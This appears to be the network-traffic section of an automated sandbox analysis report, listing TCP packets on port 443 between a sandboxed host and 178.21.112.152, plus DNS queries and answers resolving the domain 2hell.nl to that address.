Aug 18, 2022 03:26:27.591032982 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.591059923 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.591826916 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.593431950 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.624212980 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.624478102 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.624552011 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.624588966 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.624609947 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.624625921 CEST	49177	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.624634027 CEST	443	49177	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.624881983 CEST	49178	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.624918938 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.624985933 CEST	49178	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.625117064 CEST	49178	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.625130892 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.678792000 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.679228067 CEST	49178	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.679258108 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.680341959 CEST	49178	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.680355072 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.735126019 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.735229969 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:27.735296965 CEST	49178	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.735750914 CEST	49178	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:27.735773087 CEST	443	49178	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.828907967 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.828941107 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.829010963 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.829351902 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.829370022 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.884264946 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.884381056 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.905508041 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.905529976 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.906013012 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.907669067 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.933871984 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.934182882 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.934269905 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.934336901 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.934356928 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.934372902 CEST	49179	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.934381008 CEST	443	49179	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.934674025 CEST	49180	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.934706926 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:28.934773922 CEST	49180	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.934901953 CEST	49180	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:28.934916973 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.049283981 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.050079107 CEST	49180	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.050110102 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.051697016 CEST	49180	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.051717043 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.102128983 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.102318048 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.102416992 CEST	49180	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.102461100 CEST	49180	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.102492094 CEST	443	49180	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.164927959 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.164982080 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.165102959 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.165364027 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.165390015 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.219578981 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.219805956 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.234894991 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.234908104 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.237591982 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.237600088 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.274084091 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.274164915 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.274305105 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.274401903 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.274418116 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.274461985 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.274476051 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.274522066 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.276987076 CEST	49181	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.277009010 CEST	443	49181	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.466778040 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.466850996 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.466979027 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.467436075 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.467468023 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.524586916 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.524719000 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.544425964 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.544466019 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.547264099 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.547302008 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.578814983 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.578917980 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.578948975 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.579026937 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.579051018 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.579070091 CEST	443	49182	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.579081059 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.579138994 CEST	49182	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.767379999 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.767416000 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.767493963 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.767754078 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.767766953 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.821538925 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.821661949 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.834794044 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.834815025 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.838196993 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.838211060 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.871902943 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.871989965 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.872019053 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.872051001 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.872073889 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.872091055 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.872101068 CEST	443	49183	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.872111082 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.872122049 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.872147083 CEST	49183	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.993560076 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.993613005 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:29.993681908 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.993980885 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:29.994010925 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.050597906 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.050750017 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:30.066996098 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:30.067029953 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.067912102 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.077763081 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:30.105458021 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.105593920 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.105684042 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:30.105768919 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:30.105798006 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.105828047 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:30.105843067 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:30.105881929 CEST	49184	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:30.105894089 CEST	443	49184	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.228614092 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.228693962 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.228782892 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.229090929 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.229116917 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.284296989 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.284399986 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.296518087 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.296551943 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.297146082 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.298226118 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.334104061 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.334306002 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.334580898 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.334765911 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.334803104 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.334825993 CEST	49185	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.334837914 CEST	443	49185	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.335710049 CEST	49186	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.335758924 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.335859060 CEST	49186	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.336083889 CEST	49186	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.336110115 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.390105963 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.395313978 CEST	49186	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.395349979 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.398246050 CEST	49186	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.398258924 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.440855026 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.441067934 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:31.441160917 CEST	49186	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.441317081 CEST	49186	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:31.441348076 CEST	443	49186	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.376491070 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.376535892 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.376612902 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.383979082 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.383996010 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.439623117 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.439737082 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.452527046 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.452569008 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.453336000 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.455018044 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.489166975 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.489384890 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.489593029 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.491607904 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.491667032 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.491708040 CEST	49187	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.491723061 CEST	443	49187	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.492157936 CEST	49188	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.492209911 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.492286921 CEST	49188	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.495819092 CEST	49188	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.495848894 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.550169945 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.550585985 CEST	49188	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.550625086 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.551805019 CEST	49188	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.551817894 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.601104021 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.601293087 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.601538897 CEST	49188	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.607307911 CEST	49188	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.607342005 CEST	443	49188	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.620943069 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.621007919 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.621098042 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.621252060 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.621268988 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.675162077 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.675282955 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.689403057 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.689436913 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.692982912 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.693016052 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.725722075 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.725920916 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.725976944 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.726008892 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.726026058 CEST	443	49189	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.726042986 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.727767944 CEST	49189	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.728760958 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.728821039 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.728909016 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.729113102 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.729131937 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.783004045 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.783129930 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.799756050 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.799779892 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.804323912 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.804347038 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.835503101 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.835597992 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.835624933 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.835655928 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.835700035 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.835716009 CEST	443	49190	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:32.835727930 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.835738897 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:32.835767031 CEST	49190	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.027527094 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.027592897 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.027712107 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.041888952 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.041933060 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.096925974 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.097075939 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.113004923 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.113032103 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.118805885 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.118859053 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.147566080 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.147661924 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.147680998 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.147711039 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.147732973 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.147764921 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.147783995 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.147805929 CEST	443	49191	178.21.112.152	192.168.2.22
Aug 18, 2022 03:26:33.147814989 CEST	49191	443	192.168.2.22	178.21.112.152
Aug 18, 2022 03:26:33.147862911 CEST	49191	443	192.168.2.22	178.21.112.152

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2022 03:26:14.132697105 CEST	49688	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:14.172312975 CEST	53	49688	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:19.898319960 CEST	58836	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:19.937839031 CEST	53	58836	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:19.943753004 CEST	50134	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:19.982876062 CEST	53	50134	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:24.749608994 CEST	55275	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:24.771452904 CEST	53	55275	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:24.782529116 CEST	59915	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:24.823863029 CEST	53	59915	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:27.424046040 CEST	54408	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:27.463329077 CEST	53	54408	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:27.470101118 CEST	50108	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:27.517323971 CEST	53	50108	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:28.789442062 CEST	54723	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:28.808691025 CEST	53	54723	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:28.810887098 CEST	58062	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:28.828114986 CEST	53	58062	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:29.904416084 CEST	56703	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:29.923461914 CEST	53	56703	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:29.928502083 CEST	59241	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:29.992835045 CEST	53	59241	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:31.190190077 CEST	55244	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:31.207489967 CEST	53	55244	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:31.209192991 CEST	53958	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:31.228089094 CEST	53	53958	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:32.329346895 CEST	56020	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:32.346155882 CEST	53	56020	8.8.8.8	192.168.2.22
Aug 18, 2022 03:26:32.348210096 CEST	51663	53	192.168.2.22	8.8.8.8
Aug 18, 2022 03:26:32.367182970 CEST	53	51663	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 18, 2022 03:26:14.132697105 CEST	192.168.2.22	8.8.8.8	0x5930	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:19.898319960 CEST	192.168.2.22	8.8.8.8	0x75e7	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:19.943753004 CEST	192.168.2.22	8.8.8.8	0x1897	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:24.749608994 CEST	192.168.2.22	8.8.8.8	0xf2ca	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:24.782529116 CEST	192.168.2.22	8.8.8.8	0xdc64	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:27.424046040 CEST	192.168.2.22	8.8.8.8	0xbe50	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:27.470101118 CEST	192.168.2.22	8.8.8.8	0x646c	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:28.789442062 CEST	192.168.2.22	8.8.8.8	0x12f1	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:28.810887098 CEST	192.168.2.22	8.8.8.8	0xe6e0	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:29.904416084 CEST	192.168.2.22	8.8.8.8	0x2057	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:29.928502083 CEST	192.168.2.22	8.8.8.8	0x5cd7	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:31.190190077 CEST	192.168.2.22	8.8.8.8	0x6703	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:31.209192991 CEST	192.168.2.22	8.8.8.8	0x7820	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:32.329346895 CEST	192.168.2.22	8.8.8.8	0x2c87	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:32.348210096 CEST	192.168.2.22	8.8.8.8	0x4c7a	Standard query (0)	2hell.nl	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 18, 2022 03:26:14.172312975 CEST	8.8.8.8	192.168.2.22	0x5930	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:19.937839031 CEST	8.8.8.8	192.168.2.22	0x75e7	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:19.982876062 CEST	8.8.8.8	192.168.2.22	0x1897	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:24.771452904 CEST	8.8.8.8	192.168.2.22	0xf2ca	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:24.823863029 CEST	8.8.8.8	192.168.2.22	0xdc64	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
